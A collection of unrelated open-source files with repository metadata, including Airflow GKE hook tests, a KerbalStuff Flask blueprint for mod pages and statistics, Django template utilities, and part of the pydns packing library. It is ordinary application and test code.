self.gke_hook.create_cluster(mock_cluster_proto, retry=retry_mock,
timeout=timeout_mock)
client_create.assert_called_with(project_id=TEST_PROJECT_ID, zone=ZONE,
cluster=mock_cluster_proto,
retry=retry_mock, timeout=timeout_mock)
wait_mock.assert_called_with(client_create.return_value)
convert_mock.assert_not_called()
@mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook._dict_to_proto")
@mock.patch(
"airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.wait_for_operation")
def test_delete_cluster_dict(self, wait_mock, convert_mock):
mock_cluster_dict = {'name': CLUSTER_NAME}
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_create = self.gke_hook.client.create_cluster = mock.Mock()
proto_mock = convert_mock.return_value = mock.Mock()
self.gke_hook.create_cluster(mock_cluster_dict, retry=retry_mock,
timeout=timeout_mock)
client_create.assert_called_with(project_id=TEST_PROJECT_ID, zone=ZONE,
cluster=proto_mock,
retry=retry_mock, timeout=timeout_mock)
wait_mock.assert_called_with(client_create.return_value)
self.assertEqual(convert_mock.call_args[1]['py_dict'], mock_cluster_dict)
@mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook._dict_to_proto")
@mock.patch(
"airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.wait_for_operation")
def test_create_cluster_error(self, wait_mock, convert_mock):
# to force an error
mock_cluster_proto = None
with self.assertRaises(AirflowException):
self.gke_hook.create_cluster(mock_cluster_proto)
wait_mock.assert_not_called()
convert_mock.assert_not_called()
class GKEClusterHookGetTest(unittest.TestCase):
def setUp(self):
with mock.patch.object(GKEClusterHook, "__init__", return_value=None):
self.gke_hook = GKEClusterHook(None, None, None)
self.gke_hook.project_id = TEST_PROJECT_ID
self.gke_hook.location = ZONE
self.gke_hook.client = mock.Mock()
def test_get_cluster(self):
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_get = self.gke_hook.client.get_cluster = mock.Mock()
self.gke_hook.get_cluster(name=CLUSTER_NAME, retry=retry_mock,
timeout=timeout_mock)
client_get.assert_called_with(project_id=TEST_PROJECT_ID, zone=ZONE,
cluster_id=CLUSTER_NAME,
retry=retry_mock, timeout=timeout_mock)
class GKEClusterHookTest(unittest.TestCase):
def setUp(self):
with mock.patch.object(GKEClusterHook, "__init__", return_value=None):
self.gke_hook = GKEClusterHook(None, None, None)
self.gke_hook.project_id = TEST_PROJECT_ID
self.gke_hook.location = ZONE
self.gke_hook.client = mock.Mock()
def test_get_operation(self):
self.gke_hook.client.get_operation = mock.Mock()
self.gke_hook.get_operation('TEST_OP')
self.gke_hook.client.get_operation.assert_called_with(project_id=TEST_PROJECT_ID,
zone=ZONE,
operation_id='TEST_OP')
def test_append_label(self):
key = 'test-key'
val = 'test-val'
mock_proto = mock.Mock()
self.gke_hook._append_label(mock_proto, key, val)
mock_proto.resource_labels.update.assert_called_with({key: val})
def test_append_label_replace(self):
key = 'test-key'
val = 'test.val+this'
mock_proto = mock.Mock()
self.gke_hook._append_label(mock_proto, key, val)
mock_proto.resource_labels.update.assert_called_with({key: 'test-val-this'})
@mock.patch("time.sleep")
def test_wait_for_response_done(self, time_mock):
from google.cloud.container_v1.gapic.enums import Operation
mock_op = mock.Mock()
mock_op.status = Operation.Status.DONE
self.gke_hook.wait_for_operation(mock_op)
self.assertEqual(time_mock.call_count, 1)
@mock.patch("time.sleep")
def test_wait_for_response_exception(self, time_mock):
from google.cloud.container_v1.gapic.enums import Operation
from google.cloud.exceptions import GoogleCloudError
mock_op = mock.Mock()
mock_op.status = Operation.Status.ABORTING
with self.assertRaises(GoogleCloudError):
self.gke_hook.wait_for_operation(mock_op)
self.assertEqual(time_mock.call_count, 1)
@mock.patch("airflow.contrib.hooks.gcp_container_hook.GKEClusterHook.get_operation")
@mock.patch("time.sleep")
def test_wait_for_response_running(self, time_mock, operation_mock):
from google.cloud.container_v1.gapic.enums import Operation
running_op, done_op, pending_op = mock.Mock(), mock.Mock(), mock.Mock()
running_op.status = Operation.Status.RUNNING
done_op.status = Operation.Status.DONE
pending_op.status = Operation.Status.PENDING
# Status goes from Running -> Pending -> Done
operation_mock.side_effect = [pending_op, done_op]
self.gke_hook.wait_for_operation(running_op)
self.assertEqual(time_mock.call_count, 3)
operation_mock.assert_any_call(running_op.name)
operation_mock.assert_any_call(pending_op.name)
self.assertEqual(operation_mock.call_count, 2)
@mock.patch("google.protobuf.json_format.Parse")
@mock.patch("json.dumps")
def test_dict_to_proto(self, dumps_mock, parse_mock):
mock_dict = {'name': 'test'}
mock_proto = mock.Mock()
dumps_mock.return_value = mock.Mock()
self.gke_hook._dict_to_proto(mock_dict, mock_proto)
dumps_mock.assert_called_with(mock_dict)
parse_mock.assert_called_with(dumps_mock(), mock_proto)
| apache-2.0 |
ModulousSmash/Modulous | KerbalStuff/blueprints/mods.py | 1 | 19423 | from flask import Blueprint, render_template, request, g, Response, redirect, session, abort, send_file, make_response, url_for
from flask.ext.login import current_user
from sqlalchemy import desc
from KerbalStuff.objects import User, Mod, ModVersion, DownloadEvent, FollowEvent, ReferralEvent, Featured, Media, GameVersion, Category, Report
from KerbalStuff.email import send_update_notification, send_autoupdate_notification
from KerbalStuff.database import db
from KerbalStuff.common import *
from KerbalStuff.config import _cfg
from KerbalStuff.blueprints.api import default_description
from KerbalStuff.ckan import send_to_ckan
from werkzeug.utils import secure_filename
from datetime import datetime, timedelta
from shutil import rmtree, copyfile
from urllib.parse import urlparse
import os
import zipfile
import urllib
import random
mods = Blueprint('mods', __name__, template_folder='../../templates/mods')
@mods.route("/random")
def random_mod():
mods = Mod.query.filter(Mod.published == True).all()
mod = random.choice(mods)
return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
@mods.route("/mod/<int:id>/<path:mod_name>/update")
def update(id, mod_name):
mod = Mod.query.filter(Mod.id == id).first()
if not mod:
abort(404)
editable = False
if current_user.admin:
editable = True
if current_user.id == mod.user_id:
editable = True
if any([u.accepted and u.user == current_user for u in mod.shared_authors]):
editable = True
if not editable:
abort(401)
return render_template("update.html", mod=mod, game_versions=GameVersion.query.order_by(desc(GameVersion.id)).all())
@mods.route("/mod/<int:id>.rss", defaults={'mod_name': None})
@mods.route("/mod/<int:id>/<path:mod_name>.rss")
def mod_rss(id, mod_name):
mod = Mod.query.filter(Mod.id == id).first()
if not mod:
abort(404)
return render_template("rss-mod.xml", mod=mod)
@mods.route("/mod/<int:id>", defaults={'mod_name': None})
@mods.route("/mod/<int:id>/<path:mod_name>")
@with_session
def mod(id, mod_name):
mod = Mod.query.filter(Mod.id == id).first()
if not mod:
abort(404)
editable = False
if current_user:
if current_user.admin:
editable = True
if current_user.id == mod.user_id:
editable = True
if not mod.published and not editable:
abort(401)
latest = mod.default_version()
referral = request.referrer
if referral:
host = urllib.parse.urlparse(referral).hostname
event = ReferralEvent.query\
.filter(ReferralEvent.mod_id == mod.id)\
.filter(ReferralEvent.host == host)\
.first()
if not event:
event = ReferralEvent()
event.mod = mod
event.events = 1
event.host = host
db.add(event)
db.flush()
db.commit()
mod.referrals.append(event)
else:
event.events += 1
download_stats = None
follower_stats = None
referrals = None
json_versions = None
thirty_days_ago = datetime.now() - timedelta(days=30)
referrals = list()
for r in ReferralEvent.query\
.filter(ReferralEvent.mod_id == mod.id)\
.order_by(desc(ReferralEvent.events)):
referrals.append( { 'host': r.host, 'count': r.events } )
download_stats = list()
for d in DownloadEvent.query\
.filter(DownloadEvent.mod_id == mod.id)\
.filter(DownloadEvent.created > thirty_days_ago)\
.order_by(DownloadEvent.created):
download_stats.append(dumb_object(d))
follower_stats = list()
for f in FollowEvent.query\
.filter(FollowEvent.mod_id == mod.id)\
.filter(FollowEvent.created > thirty_days_ago)\
.order_by(FollowEvent.created):
follower_stats.append(dumb_object(f))
json_versions = list()
for v in mod.versions:
json_versions.append({ 'name': v.friendly_version, 'id': v.id })
if request.args.get('noedit') != None:
editable = False
forumThread = False
if mod.external_link != None:
try:
u = urlparse(mod.external_link)
if u.netloc == 'forum.kerbalspaceprogram.com':
forumThread = True
except e:
print(e)
pass
total_authors = 1
pending_invite = False
owner = editable
for a in mod.shared_authors:
if a.accepted:
total_authors += 1
if current_user:
if current_user.id == a.user_id and not a.accepted:
pending_invite = True
if current_user.id == a.user_id and a.accepted:
editable = True
game_versions = GameVersion.query.order_by(desc(GameVersion.id)).all()
outdated = False
if latest:
outdated = game_versions[0].friendly_version != latest.ksp_version
return render_template("mod.html",
**{
'mod': mod,
'latest': latest,
'safe_name': secure_filename(mod.name)[:64],
'featured': any(Featured.query.filter(Featured.mod_id == mod.id).all()),
'editable': editable,
'owner': owner,
'pending_invite': pending_invite,
'download_stats': download_stats,
'follower_stats': follower_stats,
'referrals': referrals,
'json_versions': json_versions,
'thirty_days_ago': thirty_days_ago,
'share_link': urllib.parse.quote_plus(_cfg("protocol") + "://" + _cfg("domain") + "/mod/" + str(mod.id)),
'game_versions': game_versions,
'outdated': outdated,
'forum_thread': forumThread,
'new': request.args.get('new') != None,
'stupid_user': request.args.get('stupid_user') != None,
'total_authors': total_authors
})
@mods.route("/mod/<int:id>/<path:mod_name>/edit", methods=['GET', 'POST'])
@with_session
@loginrequired
def edit_mod(id, mod_name):
mod = Mod.query.filter(Mod.id == id).first()
if not mod:
abort(404)
editable = False
if current_user.admin:
editable = True
if current_user.id == mod.user_id:
editable = True
if any([u.accepted and u.user == current_user for u in mod.shared_authors]):
editable = True
if not editable:
abort(401)
if request.method == 'GET':
return render_template("edit_mod.html", mod=mod, original=mod.user == current_user, categories = Category.query.all())
else:
short_description = request.form.get('short-description')
tags = request.form.get('tags')
other_authors = request.form.get('other-authors')
print(request.form.get('other-authors'))
tags_array = request.form.get('tags')
modmm = request.form.get('modmm')
if modmm == None:
modmm = False
else:
modmm = (modmm.lower() == "true" or modmm.lower() == "yes" or modmm.lower() == "on")
license = request.form.get('license')
category = request.form.get('category')
donation_link = request.form.get('donation-link')
external_link = request.form.get('external-link')
source_link = request.form.get('source-link')
description = request.form.get('description')
background = request.form.get('background')
bgOffsetY = request.form.get('bg-offset-y')
if not license or license == '':
return render_template("edit_mod.html", mod=mod, error="All mods must have a license.")
if not category or category == '':
abort(401)
else:
category = Category.query.filter(Category.name == category).first()
mod.short_description = short_description
mod.license = license
mod.donation_link = donation_link
mod.external_link = external_link
mod.source_link = source_link
mod.description = description
mod.tags = tags
mod.modmm = modmm
mod.category = category
if other_authors == 'None' or other_authors == '':
mod.other_authors = None
else:
mod.other_authors = other_authors
if background and background != '':
mod.background = background
try:
mod.bgOffsetY = int(bgOffsetY)
except:
pass
return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
@mods.route("/create/mod")
@loginrequired
@with_session
def create_mod():
return render_template("create.html", **{ 'game_versions': GameVersion.query.order_by(desc(GameVersion.id)).all(), 'categories': Category.query.all()})
@mods.route("/mod/<int:mod_id>/stats/downloads", defaults={'mod_name': None})
@mods.route("/mod/<int:mod_id>/<path:mod_name>/stats/downloads")
def export_downloads(mod_id, mod_name):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
download_stats = DownloadEvent.query\
.filter(DownloadEvent.mod_id == mod.id)\
.order_by(DownloadEvent.created)
response = make_response(render_template("downloads.csv", stats=download_stats))
response.headers['Content-Type'] = 'text/csv'
response.headers['Content-Disposition'] = 'attachment;filename=downloads.csv'
return response
@mods.route("/mod/<int:mod_id>/stats/followers", defaults={'mod_name': None})
@mods.route("/mod/<int:mod_id>/<path:mod_name>/stats/followers")
def export_followers(mod_id, mod_name):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
follower_stats = FollowEvent.query\
.filter(FollowEvent.mod_id == mod.id)\
.order_by(FollowEvent.created)
response = make_response(render_template("followers.csv", stats=follower_stats))
response.headers['Content-Type'] = 'text/csv'
response.headers['Content-Disposition'] = 'attachment;filename=followers.csv'
return response
@mods.route("/mod/<int:mod_id>/stats/referrals", defaults={'mod_name': None})
@mods.route("/mod/<mod_id>/<path:mod_name>/stats/referrals")
def export_referrals(mod_id, mod_name):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
referral_stats = ReferralEvent.query\
.filter(ReferralEvent.mod_id == mod.id)\
.order_by(desc(ReferralEvent.events))
response = make_response(render_template("referrals.csv", stats=referral_stats))
response.headers['Content-Type'] = 'text/csv'
response.headers['Content-Disposition'] = 'attachment;filename=referrals.csv'
return response
@mods.route("/mod/<int:mod_id>/delete", methods=['POST'])
@loginrequired
@with_session
def delete(mod_id):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
editable = False
if current_user:
if current_user.admin:
editable = True
if current_user.id == mod.user_id:
editable = True
if not editable:
abort(401)
db.delete(mod)
for feature in Featured.query.filter(Featured.mod_id == mod.id).all():
db.delete(feature)
for media in Media.query.filter(Media.mod_id == mod.id).all():
db.delete(media)
for version in ModVersion.query.filter(ModVersion.mod_id == mod.id).all():
db.delete(version)
base_path = os.path.join(secure_filename(mod.user.username) + '_' + str(mod.user.id), secure_filename(mod.name))
full_path = os.path.join(_cfg('storage'), base_path)
db.commit()
rmtree(full_path)
return redirect("/profile/" + current_user.username)
@mods.route("/mod/<int:mod_id>/follow", methods=['POST'])
@loginrequired
@json_output
@with_session
def follow(mod_id):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
if any(m.id == mod.id for m in current_user.following):
abort(418)
event = FollowEvent.query\
.filter(FollowEvent.mod_id == mod.id)\
.order_by(desc(FollowEvent.created))\
.first()
# Events are aggregated hourly
if not event or ((datetime.now() - event.created).seconds / 60 / 60) >= 1:
event = FollowEvent()
event.mod = mod
event.delta = 1
event.events = 1
db.add(event)
db.flush()
db.commit()
mod.follow_events.append(event)
else:
event.delta += 1
event.events += 1
mod.follower_count += 1
current_user.following.append(mod)
return { "success": True }
@mods.route("/mod/<int:mod_id>/unfollow", methods=['POST'])
@loginrequired
@json_output
@with_session
def unfollow(mod_id):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
if not any(m.id == mod.id for m in current_user.following):
abort(418)
event = FollowEvent.query\
.filter(FollowEvent.mod_id == mod.id)\
.order_by(desc(FollowEvent.created))\
.first()
# Events are aggregated hourly
if not event or ((datetime.now() - event.created).seconds / 60 / 60) >= 1:
event = FollowEvent()
event.mod = mod
event.delta = -1
event.events = 1
mod.follow_events.append(event)
db.add(event)
else:
event.delta -= 1
event.events += 1
mod.follower_count -= 1
current_user.following = [m for m in current_user.following if m.id != int(mod_id)]
return { "success": True }
@mods.route('/mod/<int:mod_id>/feature', methods=['POST'])
@adminrequired
@json_output
@with_session
def feature(mod_id):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
if any(Featured.query.filter(Featured.mod_id == mod_id).all()):
abort(409)
feature = Featured()
feature.mod = mod
db.add(feature)
return { "success": True }
@mods.route('/mod/<mod_id>/unfeature', methods=['POST'])
@adminrequired
@json_output
@with_session
def unfeature(mod_id):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
feature = Featured.query.filter(Featured.mod_id == mod_id).first()
if not feature:
abort(404)
db.delete(feature)
return { "success": True }
@mods.route('/mod/<int:mod_id>/<path:mod_name>/publish')
@with_session
@loginrequired
def publish(mod_id, mod_name):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
if current_user.id != mod.user_id:
abort(401)
if mod.description == default_description:
return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name, stupid_user=True))
mod.published = True
mod.updated = datetime.now()
send_to_ckan(mod)
return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
@mods.route('/mod/<int:mod_id>/download/<version>', defaults={ 'mod_name': None })
@mods.route('/mod/<int:mod_id>/<path:mod_name>/download/<version>')
@with_session
def download(mod_id, mod_name, version):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
if not mod.published and (not current_user or current_user.id != mod.user_id):
abort(401)
version = ModVersion.query.filter(ModVersion.mod_id == mod_id, \
ModVersion.friendly_version == version).first()
if not version:
abort(404)
download = DownloadEvent.query\
.filter(DownloadEvent.mod_id == mod.id and DownloadEvent.version_id == version.id)\
.order_by(desc(DownloadEvent.created))\
.first()
if not os.path.isfile(os.path.join(_cfg('storage'), version.download_path)):
abort(404)
if not 'Range' in request.headers:
# Events are aggregated hourly
if not download or ((datetime.now() - download.created).seconds / 60 / 60) >= 1:
download = DownloadEvent()
download.mod = mod
download.version = version
download.downloads = 1
db.add(download)
db.flush()
db.commit()
mod.downloads.append(download)
else:
download.downloads += 1
mod.download_count += 1
response = make_response(send_file(os.path.join(_cfg('storage'), version.download_path), as_attachment = True))
if _cfg("use-x-accel") == 'true':
response = make_response("")
response.headers['Content-Type'] = 'application/zip'
response.headers['Content-Disposition'] = 'attachment; filename=' + os.path.basename(version.download_path)
response.headers['X-Accel-Redirect'] = '/internal/' + version.download_path
return response
@mods.route('/mod/<int:mod_id>/version/<version_id>/delete', methods=['POST'])
@with_session
@loginrequired
def delete_version(mod_id, version_id):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
editable = False
if current_user:
if current_user.admin:
editable = True
if current_user.id == mod.user_id:
editable = True
if any([u.accepted and u.user == current_user for u in mod.shared_authors]):
editable = True
if not editable:
abort(401)
version = [v for v in mod.versions if v.id == int(version_id)]
if len(mod.versions) == 1:
abort(400)
if len(version) == 0:
abort(404)
if version[0].id == mod.default_version_id:
abort(400)
db.delete(version[0])
mod.versions = [v for v in mod.versions if v.id != int(version_id)]
db.commit()
return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
@mods.route('/mod/<int:mod_id>/<mod_name>/edit_version', methods=['POST'])
@mods.route('/mod/<int:mod_id>/edit_version', methods=['POST'], defaults={ 'mod_name': None })
@with_session
@loginrequired
def edit_version(mod_name, mod_id):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
editable = False
if current_user:
if current_user.admin:
editable = True
if current_user.id == mod.user_id:
editable = True
if any([u.accepted and u.user == current_user for u in mod.shared_authors]):
editable = True
if not editable:
abort(401)
version_id = int(request.form.get('version-id'))
changelog = request.form.get('changelog')
version = [v for v in mod.versions if v.id == version_id]
if len(version) == 0:
abort(404)
version = version[0]
version.changelog = changelog
return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
@mods.route('/mod/<int:mod_id>/autoupdate', methods=['POST'])
@with_session
@loginrequired
def autoupdate(mod_id):
mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
editable = False
if current_user:
if current_user.admin:
editable = True
if current_user.id == mod.user_id:
editable = True
if any([u.accepted and u.user == current_user for u in mod.shared_authors]):
editable = True
if not editable:
abort(401)
default = mod.default_version()
default.ksp_version = GameVersion.query.order_by(desc(GameVersion.id)).first().friendly_version
send_autoupdate_notification(mod)
return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
| mit |
samstern/Greengraph | Greengraph/tests/test_maps.py | 1 | 2937 | from ..greengraph import Greengraph
from ..map import Map
import geopy
from nose.tools import assert_equal, assert_almost_equal
import numpy.testing as np_test
from mock import Mock, patch
import requests
from matplotlib import image
import yaml
import os
import numpy as np
#@patch.object(Greengraph, 'location_sequence')
#@patch.object(Map, 'count_green')
def test_map_constructor():
mock_image= open(os.path.join(os.path.dirname(__file__),'fixtures','NY_2.png'),'rb') #as mock_imgfile:
with patch.object(requests,'get',return_value=Mock(content=mock_image.read())) as mock_get:
with patch.object(image,'imread') as mock_img:
#default
Map(40.7127837, -74.0059413) # New York
#Longon Map(51.5073509,-0.1277583)
mock_get.assert_called_with(
"http://maps.googleapis.com/maps/api/staticmap?",
params={
'sensor':'false',
'zoom':10,
'size':'400x400',
'center':'40.7127837,-74.0059413',
'style':'feature:all|element:labels|visibility:off',
'maptype': 'satellite'
}
)
#changing parameters
Map(41.8781136, -87.6297982,satellite=False,zoom=15,size=(500,350),sensor=True) # New York
mock_get.assert_called_with(
"http://maps.googleapis.com/maps/api/staticmap?",
params={
'sensor':'true',
'zoom':15,
'size':'500x350',
'center':'41.8781136,-87.6297982',
'style':'feature:all|element:labels|visibility:off',
#'maptype': 'satellite'
}
)
def test_green():
mock_image= open(os.path.join(os.path.dirname(__file__),'fixtures','NY_2.png'),'rb')
fixture_green = np.load(os.path.join(os.path.dirname(__file__),'fixtures','ny_green.npy'))
threshold = 1.1
with patch('requests.get', return_value=Mock(content=mock_image.read())) as mock_get:
testMap = Map(41.8781136, -87.6297982) # New York
assert_equal(fixture_green.shape,testMap.green(threshold).shape)
assert (testMap.green(threshold) == fixture_green).all() == True
assert (testMap.green(1.5) == fixture_green).all() == False
def test_count_green():
mock_image= open(os.path.join(os.path.dirname(__file__),'fixtures','NY_2.png'),'rb')
fixture_green = np.load(os.path.join(os.path.dirname(__file__),'fixtures','ny_green.npy'))
threshold = 1.1
with patch('requests.get', return_value=Mock(content=mock_image.read())) as mock_get:
testMap = Map(41.8781136, -87.6297982) # New York
count_from_fixture=np.sum(fixture_green)
assert (testMap.count_green() == count_from_fixture)
assert (testMap.count_green(1.5) != count_from_fixture) | mit |
baylee/django | django/template/utils.py | 199 | 3733 | import os
from collections import Counter, OrderedDict
from django.apps import apps
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils import lru_cache
from django.utils._os import upath
from django.utils.functional import cached_property
from django.utils.module_loading import import_string
class InvalidTemplateEngineError(ImproperlyConfigured):
pass
class EngineHandler(object):
def __init__(self, templates=None):
"""
templates is an optional list of template engine definitions
(structured like settings.TEMPLATES).
"""
self._templates = templates
self._engines = {}
@cached_property
def templates(self):
if self._templates is None:
self._templates = settings.TEMPLATES
templates = OrderedDict()
backend_names = []
for tpl in self._templates:
tpl = tpl.copy()
try:
# This will raise an exception if 'BACKEND' doesn't exist or
# isn't a string containing at least one dot.
default_name = tpl['BACKEND'].rsplit('.', 2)[-2]
except Exception:
invalid_backend = tpl.get('BACKEND', '<not defined>')
raise ImproperlyConfigured(
"Invalid BACKEND for a template engine: {}. Check "
"your TEMPLATES setting.".format(invalid_backend))
tpl.setdefault('NAME', default_name)
tpl.setdefault('DIRS', [])
tpl.setdefault('APP_DIRS', False)
tpl.setdefault('OPTIONS', {})
templates[tpl['NAME']] = tpl
backend_names.append(tpl['NAME'])
counts = Counter(backend_names)
duplicates = [alias for alias, count in counts.most_common() if count > 1]
if duplicates:
raise ImproperlyConfigured(
"Template engine aliases aren't unique, duplicates: {}. "
"Set a unique NAME for each engine in settings.TEMPLATES."
.format(", ".join(duplicates)))
return templates
def __getitem__(self, alias):
try:
return self._engines[alias]
except KeyError:
try:
params = self.templates[alias]
except KeyError:
raise InvalidTemplateEngineError(
"Could not find config for '{}' "
"in settings.TEMPLATES".format(alias))
# If importing or initializing the backend raises an exception,
# self._engines[alias] isn't set and this code may get executed
# again, so we must preserve the original params. See #24265.
params = params.copy()
backend = params.pop('BACKEND')
engine_cls = import_string(backend)
engine = engine_cls(params)
self._engines[alias] = engine
return engine
def __iter__(self):
return iter(self.templates)
def all(self):
return [self[alias] for alias in self]
@lru_cache.lru_cache()
def get_app_template_dirs(dirname):
"""
Return an iterable of paths of directories to load app templates from.
dirname is the name of the subdirectory containing templates inside
installed applications.
"""
template_dirs = []
for app_config in apps.get_app_configs():
if not app_config.path:
continue
template_dir = os.path.join(app_config.path, dirname)
if os.path.isdir(template_dir):
template_dirs.append(upath(template_dir))
# Immutable return value because it will be cached and shared by callers.
return tuple(template_dirs)
| bsd-3-clause |
iw3hxn/LibrERP | l10n_ch_scan_bvr/partner.py | 4 | 1433 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Vincent Renaville
# Copyright 2013 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv.orm import Model, fields
class ResPartner(Model):
_inherit = 'res.partner'
_columns = {
'supplier_invoice_default_product': fields.many2one(
'product.product',
'Default product supplier invoice',
help="Use by the scan BVR wizard, if completed, it'll generate "
"a line with the proper amount and this specified product"
),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
hefen1/chromium | native_client_sdk/src/tools/tests/chrome_mock.py | 51 | 1549 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Mock chrome process used by test code for http server."""
import argparse
import sys
import time
import urllib2
def PrintAndFlush(s):
sys.stdout.write(s + '\n')
sys.stdout.flush()
def main(args):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--post', help='POST to URL.', dest='post',
action='store_true')
parser.add_argument('--get', help='GET to URL.', dest='get',
action='store_true')
parser.add_argument('--sleep',
help='Number of seconds to sleep after reading URL',
dest='sleep', default=0)
parser.add_argument('--expect-to-be-killed', help='If set, the script will'
' warn if it isn\'t killed before it finishes sleeping.',
dest='expect_to_be_killed', action='store_true')
parser.add_argument('url')
options = parser.parse_args(args)
PrintAndFlush('Starting %s.' % sys.argv[0])
if options.post:
urllib2.urlopen(options.url, data='').read()
elif options.get:
urllib2.urlopen(options.url).read()
else:
# Do nothing but wait to be killed.
pass
time.sleep(float(options.sleep))
if options.expect_to_be_killed:
PrintAndFlush('Done sleeping. Expected to be killed.')
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| bsd-3-clause |
cfromknecht/namecoin-legacy | client/DNS/Lib.py | 39 | 23343 | # -*- encoding: utf-8 -*-
"""
$Id: Lib.py,v 1.11.2.7 2009/06/09 18:39:06 customdesigned Exp $
This file is part of the pydns project.
Homepage: http://pydns.sourceforge.net
This code is covered by the standard Python License.
Library code. Largely this is packers and unpackers for various types.
"""
#
#
# See RFC 1035:
# ------------------------------------------------------------------------
# Network Working Group P. Mockapetris
# Request for Comments: 1035 ISI
# November 1987
# Obsoletes: RFCs 882, 883, 973
#
# DOMAIN NAMES - IMPLEMENTATION AND SPECIFICATION
# ------------------------------------------------------------------------
import string, types
import Type
import Class
import Opcode
import Status
import DNS
from Base import DNSError
LABEL_UTF8 = False
LABEL_ENCODING = 'idna'
class UnpackError(DNSError): pass
class PackError(DNSError): pass
# Low-level 16 and 32 bit integer packing and unpacking
from struct import pack as struct_pack
from struct import unpack as struct_unpack
from socket import inet_ntoa, inet_aton
def pack16bit(n):
return struct_pack('!H', n)
def pack32bit(n):
return struct_pack('!L', n)
def unpack16bit(s):
return struct_unpack('!H', s)[0]
def unpack32bit(s):
return struct_unpack('!L', s)[0]
def addr2bin(addr):
return struct_unpack('!l', inet_aton(addr))[0]
def bin2addr(n):
return inet_ntoa(struct_pack('!L', n))
# Packing class
class Packer:
" packer base class. supports basic byte/16bit/32bit/addr/string/name "
def __init__(self):
self.buf = ''
self.index = {}
def getbuf(self):
return self.buf
def addbyte(self, c):
if len(c) != 1: raise TypeError, 'one character expected'
self.buf = self.buf + c
def addbytes(self, bytes):
self.buf = self.buf + bytes
def add16bit(self, n):
self.buf = self.buf + pack16bit(n)
def add32bit(self, n):
self.buf = self.buf + pack32bit(n)
def addaddr(self, addr):
n = addr2bin(addr)
self.buf = self.buf + pack32bit(n)
def addstring(self, s):
if len(s) > 255:
raise ValueError, "Can't encode string of length "+ \
"%s (> 255)"%(len(s))
self.addbyte(chr(len(s)))
self.addbytes(s)
def addname(self, name):
# Domain name packing (section 4.1.4)
# Add a domain name to the buffer, possibly using pointers.
# The case of the first occurrence of a name is preserved.
# Redundant dots are ignored.
list = []
for label in string.splitfields(name, '.'):
if not label:
raise PackError, 'empty label'
list.append(label)
keys = []
for i in range(len(list)):
key = string.upper(string.joinfields(list[i:], '.'))
keys.append(key)
if self.index.has_key(key):
pointer = self.index[key]
break
else:
i = len(list)
pointer = None
# Do it into temporaries first so exceptions don't
# mess up self.index and self.buf
buf = ''
offset = len(self.buf)
index = []
if DNS.LABEL_UTF8:
enc = 'utf8'
else:
enc = DNS.LABEL_ENCODING
for j in range(i):
label = list[j]
try:
label = label.encode(enc)
except UnicodeEncodeError:
if not DNS.LABEL_UTF8: raise
if not label.startswith('\ufeff'):
label = '\ufeff'+label
label = label.encode(enc)
n = len(label)
if n > 63:
raise PackError, 'label too long'
if offset + len(buf) < 0x3FFF:
index.append((keys[j], offset + len(buf)))
else:
print 'DNS.Lib.Packer.addname:',
print 'warning: pointer too big'
buf = buf + (chr(n) + label)
if pointer:
buf = buf + pack16bit(pointer | 0xC000)
else:
buf = buf + '\0'
self.buf = self.buf + buf
for key, value in index:
self.index[key] = value
def dump(self):
keys = self.index.keys()
keys.sort()
print '-'*40
for key in keys:
print '%20s %3d' % (key, self.index[key])
print '-'*40
space = 1
for i in range(0, len(self.buf)+1, 2):
if self.buf[i:i+2] == '**':
if not space: print
space = 1
continue
space = 0
print '%4d' % i,
for c in self.buf[i:i+2]:
if ' ' < c < '\177':
print ' %c' % c,
else:
print '%2d' % ord(c),
print
print '-'*40
# Unpacking class
class Unpacker:
def __init__(self, buf):
self.buf = buf
self.offset = 0
def getbyte(self):
if self.offset >= len(self.buf):
raise UnpackError, "Ran off end of data"
c = self.buf[self.offset]
self.offset = self.offset + 1
return c
def getbytes(self, n):
s = self.buf[self.offset : self.offset + n]
if len(s) != n: raise UnpackError, 'not enough data left'
self.offset = self.offset + n
return s
